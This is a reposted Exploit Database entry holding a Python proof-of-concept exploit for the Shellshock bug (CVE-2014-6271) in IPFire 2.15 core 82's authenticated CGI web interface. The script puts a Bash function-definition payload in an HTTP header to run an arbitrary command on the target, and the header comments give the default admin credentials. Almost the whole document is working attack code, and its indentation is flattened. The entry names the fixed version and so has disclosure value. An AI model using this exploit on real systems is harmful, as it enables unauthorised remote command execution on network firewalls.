IPFire – CGI Web Interface (Authenticated) Bash Environment Variable Code Injection

• Exploit Database
• 15 阅读

• 作者： Claudio Viviani
  日期： 2014-10-01
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/34839/

• #!/usr/bin/env python
  #
  # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
  #
  # Exploit Author : Claudio Viviani
  #
  # Vendor Homepage : http://www.ipfire.org
  #
  # Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
  #
  # Date : 2014-09-29
  #
  # Fixed version: IPFire 2.15 core 83 (2014-09-28)
  #
  # Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
  # It can be maintained via a web interface.
  # The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
  # IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
  #
  # Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
  #(CVE-2014-6271)
  #
  # Suggestion:
  #
  # If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
  # make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
  #
  #
  # http connection
  import urllib2
  # Basic Auth management Base64
  import base64
  # Args management
  import optparse
  # Error management
  import sys
  
  banner = """
   ___ _______ _______ _________ __
  | | _ | _ |__.----.-----. | _ .-----|__|
  |.|.1 |.1___|| _|-__| |.1___|_||
  |.|.____|.__) |__|__| |_____| |.|___|___|__|
  |:|:| |:| |:1 |_____|
  |::.|::.| |::.| |::.. . |
  `---`---' `---' `-------'
   _______ ____ __ _______ __ __
  | _ ||--.-----||| _ ||--.-----.----||--.
  | 1___| |-__||| 1___| |_|__|<
  |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
  |:1 | |:1 |
  |::.. . | |::.. . |
  `-------' `-------'
  
  IPFire <= 2.15 c0re 82 Authenticated
  Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
  
  Written by:
  
  Claudio Viviani
  
   http://www.homelab.it
  
  info@homelab.it
  homelabit@protonmail.ch
  
   https://www.facebook.com/homelabit
  https://twitter.com/homelabit
   https://plus.google.com/+HomelabIt1/
   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  """
  
  # Check url
  def checkurl(url):
  if url[:8] != "https://" and url[:7] != "http://":
  print('[X] You must insert http:// or https:// procotol')
  sys.exit(1)
  else:
  return url
  
  def connectionScan(url,user,pwd,cmd):
  print '[+] Connection in progress...'
  try:
  response = urllib2.Request(url)
  content = urllib2.urlopen(response)
  print '[X] IPFire Basic Authentication not found'
  except urllib2.HTTPError, e:
  if e.code == 404:
  print '[X] Page not found'
  elif e.code == 401:
  try:
  print '[+] Authentication in progress...'
  base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
  headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
  response = urllib2.Request(url, None, headers)
  response.add_header("Authorization", "Basic %s" % base64string)
  content = urllib2.urlopen(response).read()
  if "ipfire" in content:
  print '[+] Username & Password: OK'
  print '[+] Checking for vulnerability...'
  if 'H0m3l4b1t' incontent:
  print '[!] Command "'+cmd+'": INJECTED!'
  else:
  print '[X] Not Vulnerable :('
  else:
   print '[X] No IPFire page found'
  except urllib2.HTTPError, e:
  if e.code == 401:
   print '[X] Wrong username or password'
  else:
   print '[X] HTTP Error: '+str(e.code)
  except urllib2.URLError:
  print '[X] Connection Error'
  else:
  print '[X] HTTP Error: '+str(e.code)
  except urllib2.URLError:
  print '[X] Connection Error'
  
  commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
  commandList.add_option('-t', '--target', action="store",
  help="Insert TARGET URL",
  )
  commandList.add_option('-c', '--cmd', action="store",
  help="Insert command name",
  )
  commandList.add_option('-u', '--user', action="store",
  help="Insert username",
  )
  commandList.add_option('-p', '--pwd', action="store",
  help="Insert password",
  )
  options, remainder = commandList.parse_args()
  
  # Check args
  if not options.target or not options.cmd or not options.user or not options.pwd:
  print(banner)
  commandList.print_help()
  sys.exit(1)
  
  print(banner)
  
  url = checkurl(options.target)
  cmd = options.cmd
  user = options.user
  pwd = options.pwd
  
  connectionScan(url,user,pwd,cmd)